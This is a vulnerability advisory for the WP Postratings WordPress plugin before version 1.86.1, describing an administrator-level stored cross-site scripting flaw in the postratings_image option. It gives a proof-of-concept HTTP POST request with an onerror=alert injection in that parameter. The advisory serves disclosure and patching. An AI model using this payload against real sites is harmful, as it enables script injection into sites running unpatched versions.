WordPress Plugin Vulnerabilities
WP Postratings < 1.86.1 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.
Proof of Concept
POST /wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 1954 Connection: close Cookie: [admin cookies] Upgrade-Insecure-Requests: 1 _wpnonce=fad0d9fb37&postratings_image=plusminus_crystal\"+onerror=alert(/XSS/);/&postratings_max=2&[SNIPPED]&Submit=Save+Changes
Affects Plugins
References
CVE
Exploitdb
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Park Won Seok
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-12-24 (about 3 years ago)
Added
2020-12-24 (about 3 years ago)
Last Updated
2022-04-09 (about 2 years ago)